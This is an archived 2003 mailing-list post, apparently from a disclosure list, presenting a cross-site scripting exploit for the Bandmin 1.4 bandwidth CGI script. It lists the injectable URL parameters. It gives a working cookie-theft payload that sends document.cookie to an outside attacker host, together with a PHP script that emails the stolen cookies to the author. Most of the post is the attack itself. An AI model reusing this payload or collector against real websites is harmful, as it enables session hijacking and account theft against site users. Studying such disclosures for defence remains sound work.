Bandmin 1.4 XSS Exploit

From: silent needel (silentneedleat_private)
Date: Wed May 28 2003 - 09:38:40 PDT

Next message: D4rkGr3y: "Tornado www-server v1.2: directory traversal, buffer overflow"

Previous message: postmasterat_private: "Remote PC Access Server 2.2 Vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) Bandmin 1.4 XSS Exploit by Silent Needle A:BACKGROUND Bandmin is a cgi script show you the bandwidth for the sites in the server. B:DESCRIPTION The cross site scripting allow you to print a html or javascript or others in the webpage when it just open not write in the page. C:EXPLOIT These are the URLs of the exploits: 1-there is two here http://[site]/bandwidth/index.cgi?action=showmonth&year=[FIRST SCRIPT] &month=[SECOND SCRIPT] 2-one here http://[site]/bandwidth/index.cgi?action=showhost&month=May&year=2003&host= [THIRD SCRIPT] And you can steal cookie by changing [*** script] to <script>document.location='http://any-web- site/cookies.php?'+document.cookie</script> and in http://any-web-site/cookie.php put ----------------cookie.php------------------- <? mail("silentneedleat_private","cookies from bandmin",$http_cookie); echo $http_cookie; ?> ----------------------------------------------- D:GREETZ To : SP.IC , DR^^FUNNY , ARAB-HAK , ZALABOZA , OH SHE IS A LITTLE RUN AWAY :) E:CONTACT Silent Needle silentneedleat_private F:OH LONG NIGHT Bye

Next message: D4rkGr3y: "Tornado www-server v1.2: directory traversal, buffer overflow"
Previous message: postmasterat_private: "Remote PC Access Server 2.2 Vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed May 28 2003 - 21:41:51 PDT